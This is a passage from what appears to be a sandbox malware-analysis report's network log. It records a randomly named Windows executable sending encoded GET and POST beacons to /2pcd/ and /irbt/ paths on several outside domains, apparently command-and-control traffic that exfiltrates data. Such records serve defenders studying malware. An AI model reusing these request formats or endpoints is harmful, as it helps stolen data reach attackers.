uJRRhYLxKjU/2XzCaUn6h/z88Z [TRUNCATED]
                                              Jul 1, 2024 16:18:41.086306095 CEST333INHTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:40 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843520.2506297; expires=Thu, 29-Jun-2034 14:18:40 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-40fd-b0c0-de8fa4c780cd
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.549770103.224.182.246803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:43.039994001 CEST525OUTGET /n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A== HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:43.638958931 CEST494INHTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:43 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843523.8302071; expires=Thu, 29-Jun-2034 14:18:43 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A==&sub1=20240702-0018-43fc-840f-b1c56d53c9de
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.54977172.52.179.174803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:48.836009979 CEST803OUTPOST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 67 4b 76 57 30 6f 77 53 67 48 52 41 6a 57 6c 6e 43 6d 4f 73 6b 46 6f 55 32 39 6e 75 4d 57 44 49 5a 46 68 51 4b 72 68 50 59 71 6d 37 66 6f 6f 75 67 6e 45 4d 78 44 47 70 63 53 69 45 4b 63 44 45 77 66 6d 6e 46 6b 6a 38 65 6c 64 4a 52 33 6d 46 79 45 4d 42 61 63 6e 79 53 47 79 69 35 67 47 47 48 6c 79 2f 2b 37 63 53 38 49 4e 63 4b 4a 6e 6e 49 5a 76 79 54 73 43 4f 6c 68 76 37 4f 43 7a 56 52 72 2b 44 79 42 38 52 2b 63 68 46 43 6d 4a 38 62 77 53 32 5a 6d 4a 41 51 65 69 4b 62 46 52 53 6d 77 2f 51 76 32 2f 36 47 6a 70 62 49 61 49 4f 4c 55 77 78 72 31 74 70 6b 61 42 6b 48 44 57 6f 61 61 58 72 58 5a 6b 3d
                                              Data Ascii: 4dV43tA=gKvW0owSgHRAjWlnCmOskFoU29nuMWDIZFhQKrhPYqm7foougnEMxDGpcSiEKcDEwfmnFkj8eldJR3mFyEMBacnySGyi5gGGHly/+7cS8INcKJnnIZvyTsCOlhv7OCzVRr+DyB8R+chFCmJ8bwS2ZmJAQeiKbFRSmw/Qv2/6GjpbIaIOLUwxr1tpkaBkHDWoaaXrXZk=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.54977272.52.179.174803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:51.373471022 CEST823OUTPOST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 67 4b 76 57 30 6f 77 53 67 48 52 41 35 33 56 6e 46 46 6d 73 73 46 6f 58 31 39 6e 75 48 32 43 44 5a 46 64 51 4b 75 5a 68 4e 4a 53 37 66 4a 34 75 68 6d 45 4d 79 44 47 70 55 79 69 42 4f 63 44 50 77 66 72 53 46 6b 76 38 65 6c 35 4a 52 32 57 46 7a 33 6b 43 63 4d 6e 77 55 47 79 7a 7a 41 47 47 48 6c 79 2f 2b 37 34 34 38 49 56 63 4b 34 33 6e 4c 34 76 78 51 73 43 50 69 68 76 37 4b 43 7a 52 52 72 2f 57 79 43 34 37 2b 65 5a 46 43 6e 35 38 62 45 2b 35 44 32 4a 43 63 4f 6a 4b 52 6d 6f 6d 68 68 58 37 79 67 71 4a 5a 41 4a 79 41 4d 6c 6b 52 32 34 5a 34 56 42 52 30 4a 4a 54 57 7a 33 42 41 35 48 62 4a 4f 77 38 35 67 6f 71 55 47 5a 2f 7a 55 69 30 76 44 56 71 4f 63 6f 70
                                              Data Ascii: 4dV43tA=gKvW0owSgHRA53VnFFmssFoX19nuH2CDZFdQKuZhNJS7fJ4uhmEMyDGpUyiBOcDPwfrSFkv8el5JR2WFz3kCcMnwUGyzzAGGHly/+7448IVcK43nL4vxQsCPihv7KCzRRr/WyC47+eZFCn58bE+5D2JCcOjKRmomhhX7ygqJZAJyAMlkR24Z4VBR0JJTWz3BA5HbJOw85goqUGZ/zUi0vDVqOcop


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.54977372.52.179.174803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:53.901906013 CEST1840OUTPOST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 67 4b 76 57 30 6f 77 53 67 48 52 41 35 33 56 6e 46 46 6d 73 73 46 6f 58 31 39 6e 75 48 32 43 44 5a 46 64 51 4b 75 5a 68 4e 4a 4b 37 66 62 67 75 67 46 38 4d 7a 44 47 70 61 53 69 41 4f 63 44 6f 77 66 7a 65 46 6b 54 43 65 6e 78 4a 44 41 43 46 30 43 51 43 56 4d 6e 77 59 6d 7a 30 35 67 47 58 48 68 57 37 2b 37 49 34 38 49 56 63 4b 37 2f 6e 66 35 76 78 57 73 43 4f 6c 68 76 4a 4f 43 7a 31 52 72 6d 74 79 42 55 42 2b 4b 74 46 44 48 70 38 49 58 47 35 49 32 4a 36 64 2b 6a 6b 52 6e 55 35 68 68 62 64 79 67 32 6a 5a 41 78 79 52 35 34 6d 49 30 74 41 76 32 39 4d 6d 59 49 76 58 6a 7a 53 48 6f 62 4d 57 63 45 76 32 68 63 6d 52 78 35 67 34 58 62 65 34 46 52 5a 4a 34 46 6e 6f 76 62 38 59 65 6d 71 34 4e 32 33 71 34 49 71 4d 36 77 7a 53 53 47 72 67 33 53 4e 59 61 44 4c 4c 79 58 61 37 64 6c 76 65 75 76 4f 5a 48 74 41 38 69 39 50 35 5a 64 69 77 70 69 64 2b 73 51 52 51 4f 59 55 4a 32 79 54 6b 44 42 31 37 73 68 52 31 37 37 59 48 30 53 68 7a 46 61 6e 43 56 69 39 33 59 6d 55 31 65 79 6f 30 6d 66 42 79 43 [TRUNCATED]
                                              Data Ascii: 4dV43tA=gKvW0owSgHRA53VnFFmssFoX19nuH2CDZFdQKuZhNJK7fbgugF8MzDGpaSiAOcDowfzeFkTCenxJDACF0CQCVMnwYmz05gGXHhW7+7I48IVcK7/nf5vxWsCOlhvJOCz1RrmtyBUB+KtFDHp8IXG5I2J6d+jkRnU5hhbdyg2jZAxyR54mI0tAv29MmYIvXjzSHobMWcEv2hcmRx5g4Xbe4FRZJ4Fnovb8Yemq4N23q4IqM6wzSSGrg3SNYaDLLyXa7dlveuvOZHtA8i9P5Zdiwpid+sQRQOYUJ2yTkDB17shR177YH0ShzFanCVi93YmU1eyo0mfByCgKtWz9mPROmLsMttTSOk068UWMk9bJ/vV1cifmKPgwA5dzVPe4l/Q+h0jmVCfAtxcJCPTAv+3XljnpnxZ1CjkvrNghwkHx5LlJazth/eov8YjU2uqdr9BB09ITrpY2aGs6lYm/HF/v7WYVOVt8JGwXCjWb5FpqgGk2qF3Wq+BP7yeGt8zxIhxbVwpqDoOmq68Q83/i1IKbPgkUyy6N4udttfQOiRXn/VDpRLuTQZZ84rgtiGoRbRSupi2BLk/otsV5N8eSVhjVJVs4yX+R/nnCkGSu9JY4VlNW2oRmyfXTB9UlThEwxV9J90usbiXqI0D3MADEtTH8GJBMI8VAXchwAOkyKFiwX+JU2go+7fXlXwgfFCVdEdW9QKt0jAuGpjfgbyzvb1cT+kgaBBIqpNmR6YhGb7PBN8WLnpvz3gMEde3iAhUOwrHholr2dUs4jMCwEINAqpDRey2eqMo1tZmv48tC0rxFkTq6ydWWWR3DgF4043Smv33VCF1nyiTTcVhnJVpigVm4FtLWf5KfTOg/mMShgZgWhPjKSl1CIj8g2mRorpihkwIO/oMRymwcoOn8lBaJ0qC8Xc0q/BzbtsDjyMbUBYiNCqzNSpjgoMfXErfltIHchS0i3Kcfs9wiLbB0SROxANr5gVIJp8fGym/XD6KdAYxkaEnB [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.54977472.52.179.174803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:56.437958002 CEST535OUTGET /2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:57.446877956 CEST520INHTTP/1.1 302 Moved Temporarily
                                              Date: Mon, 01 Jul 2024 14:18:56 GMT
                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                              X-Powered-By: PHP/5.4.16
                                              Connection: close
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Location: http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl&usid=16&utid=33620332093
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.549775192.227.175.142803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:02.638027906 CEST776OUTPOST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 72 6f 68 4e 5a 59 55 6e 2f 4d 65 54 59 75 78 62 6d 71 4a 53 34 7a 47 70 32 64 36 74 75 4f 42 38 6c 53 31 79 44 4a 64 70 74 4e 53 39 43 34 36 54 66 44 72 4e 73 7a 68 37 46 59 72 51 61 5a 4c 4f 4f 36 33 4d 64 48 33 4e 54 76 6d 33 67 7a 43 61 4f 43 32 31 31 53 6f 46 44 36 6c 67 71 42 49 54 4e 45 7a 65 2b 39 77 68 62 35 48 64 78 47 63 30 72 70 78 44 5a 71 4f 52 4a 33 36 5a 77 5a 47 49 55 78 65 64 77 4d 6d 6d 32 61 48 51 34 62 6e 67 33 6f 79 47 7a 74 43 39 4e 65 7a 56 51 76 53 5a 4e 4b 62 38 55 5a 4c 73 78 6f 4e 4e 4a 4e 51 31 33 32 38 59 72 6b 35 73 41 74 77 73 4f 6b 73 52 36 52 31 4a 56 47 4d 3d
                                              Data Ascii: 4dV43tA=rohNZYUn/MeTYuxbmqJS4zGp2d6tuOB8lS1yDJdptNS9C46TfDrNszh7FYrQaZLOO63MdH3NTvm3gzCaOC211SoFD6lgqBITNEze+9whb5HdxGc0rpxDZqORJ36ZwZGIUxedwMmm2aHQ4bng3oyGztC9NezVQvSZNKb8UZLsxoNNJNQ1328Yrk5sAtwsOksR6R1JVGM=
                                              Jul 1, 2024 16:19:03.131706953 CEST399INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.549776192.227.175.142803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:05.500678062 CEST796OUTPOST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 72 6f 68 4e 5a 59 55 6e 2f 4d 65 54 59 4f 68 62 67 39 6c 53 6f 6a 47 71 31 64 36 74 31 2b 42 34 6c 53 35 79 44 4d 73 79 34 70 2b 39 44 61 79 54 4f 79 72 4e 74 7a 68 37 4f 34 72 4a 5a 70 4b 41 4f 37 4c 31 64 46 7a 4e 54 70 4b 33 67 78 4b 61 50 30 2b 30 31 43 6f 39 46 36 6c 69 75 42 49 54 4e 45 7a 65 2b 39 6b 66 62 39 54 64 78 31 55 30 71 49 78 45 61 71 4f 53 41 58 36 5a 68 4a 47 4d 55 78 66 36 77 4e 4b 41 32 63 44 51 34 65 6a 67 33 36 61 5a 36 74 43 2f 44 2b 79 61 52 4f 37 50 49 62 2b 73 49 5a 4b 30 74 34 41 34 4d 37 39 66 74 55 30 77 34 45 56 55 51 2b 34 62 66 55 4e 34 67 79 6c 35 4c 52 59 42 52 44 4f 4d 32 4a 6e 42 4f 5a 64 53 38 6f 78 45 70 71 49 72
                                              Data Ascii: 4dV43tA=rohNZYUn/MeTYOhbg9lSojGq1d6t1+B4lS5yDMsy4p+9DayTOyrNtzh7O4rJZpKAO7L1dFzNTpK3gxKaP0+01Co9F6liuBITNEze+9kfb9Tdx1U0qIxEaqOSAX6ZhJGMUxf6wNKA2cDQ4ejg36aZ6tC/D+yaRO7PIb+sIZK0t4A4M79ftU0w4EVUQ+4bfUN4gyl5LRYBRDOM2JnBOZdS8oxEpqIr
                                              Jul 1, 2024 16:19:06.005846977 CEST399INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.549777192.227.175.142803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:08.042437077 CEST1813OUTPOST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 72 6f 68 4e 5a 59 55 6e 2f 4d 65 54 59 4f 68 62 67 39 6c 53 6f 6a 47 71 31 64 36 74 31 2b 42 34 6c 53 35 79 44 4d 73 79 34 70 32 39 43 6f 4b 54 63 68 7a 4e 2f 6a 68 37 51 49 72 55 5a 70 4c 63 4f 36 6a 78 64 46 2f 37 54 71 2b 33 67 55 47 61 47 68 65 30 37 43 6f 39 48 36 6c 6a 71 42 49 4b 4e 45 44 61 2b 2b 63 66 62 39 54 64 78 30 6b 30 74 5a 78 45 56 4b 4f 52 4a 33 36 56 77 5a 47 6f 55 78 48 41 77 4e 2b 32 33 73 6a 51 35 2b 7a 67 30 50 47 5a 31 74 43 78 41 2b 7a 46 52 4f 6d 52 49 62 7a 41 49 61 57 65 74 37 67 34 50 4e 6f 35 32 32 34 56 6a 33 38 32 55 65 73 36 46 78 74 6e 71 41 31 73 50 54 56 75 5a 42 2b 35 37 4e 72 45 4f 4e 51 5a 69 65 51 51 75 66 52 77 46 6a 66 64 79 48 73 4d 68 33 62 33 48 36 49 36 58 45 45 4e 34 45 62 4b 6b 31 74 68 35 78 4a 72 7a 54 4c 63 4a 4a 59 55 35 54 49 37 32 53 43 4e 71 37 64 6d 35 67 56 46 2b 55 49 6c 56 2f 6e 76 51 48 6e 70 62 74 47 5a 39 4b 63 51 48 4b 6d 30 61 67 4e 43 6c 6a 38 32 49 31 69 34 54 55 38 56 4a 59 54 39 44 52 32 61 4f 6f 52 36 58 76 [TRUNCATED]
                                              Data Ascii: 4dV43tA=rohNZYUn/MeTYOhbg9lSojGq1d6t1+B4lS5yDMsy4p29CoKTchzN/jh7QIrUZpLcO6jxdF/7Tq+3gUGaGhe07Co9H6ljqBIKNEDa++cfb9Tdx0k0tZxEVKORJ36VwZGoUxHAwN+23sjQ5+zg0PGZ1tCxA+zFROmRIbzAIaWet7g4PNo5224Vj382Ues6FxtnqA1sPTVuZB+57NrEONQZieQQufRwFjfdyHsMh3b3H6I6XEEN4EbKk1th5xJrzTLcJJYU5TI72SCNq7dm5gVF+UIlV/nvQHnpbtGZ9KcQHKm0agNClj82I1i4TU8VJYT9DR2aOoR6XvdX+RZPUy3ZdZSQ2nS1/f9nHe4W7YQW796TFVKdJuvDdQ0E9gPXMAuZR5yvT8pWuAgOS9ly9lpqWqb8ah/9uCyPgtpP8mI5Ucs4H4id4AXv44TVjuFGUBY1aMYbTkXk6masxqGUvGp66wK2y+hkVvbiG1c9BJ2hMB5roNUlVfmJSsAIEaqJ28iTesb383azn3BjWIX8aKz3mFRVP13ym5UUdc0UkrmWH60qhB9/Jbg/rMPcCYcvmtg2v95lzgzO0FOXLwY+MOoltZNQNKUm53U5J9PT0RucWWn31mPN+N14u805Ybse1gYVRmVQZiaxJ7cAL7gn5aG6tHiCQnJyHxPDD3TPLV6kXWtlnLQQRZ1BJ9FRNsqcRTPZYdaXZ8Ja9L0Njn8Ec6z7nKv7eUp9/ZNFrPiR1sC08S73X3TPU4JSl4QkSNGEXcEiiGbf5xpyPwps7ag9QGj/67Msz3rt+4xx3+fobphYhl6bBH3Nb+uHWxc0VzqXv019gWiQCLnaR22fR+k8koafRONSiBwf2pUCj1B1z+cjNSxkBpgsCs1a//O/tZjlJuTV5n9HOydhBRQiyzWJosK2HRlMICJGbSkcXrANK+G+DLPjJWfwvmEQncnByTSe/DpXqo/bE9Q7alIykMXtOfEXdrsabrrYOKZ7e2TLwf4/JjFR [TRUNCATED]
                                              Jul 1, 2024 16:19:08.534682035 CEST399INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                              Jul 1, 2024 16:19:08.881989956 CEST399INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.549778192.227.175.142803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:19:10.587030888 CEST526OUTGET /irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA== HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:19:11.085134029 CEST560INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
